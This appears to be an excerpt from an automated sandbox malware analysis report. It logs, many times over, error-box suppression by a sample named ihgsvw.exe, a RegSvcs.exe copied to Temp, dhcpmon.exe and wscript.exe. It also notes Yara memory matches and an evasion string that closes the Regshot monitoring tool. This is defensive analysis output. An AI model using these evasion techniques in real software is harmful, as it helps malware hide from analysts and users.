Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.332616328.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.315942638.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")`
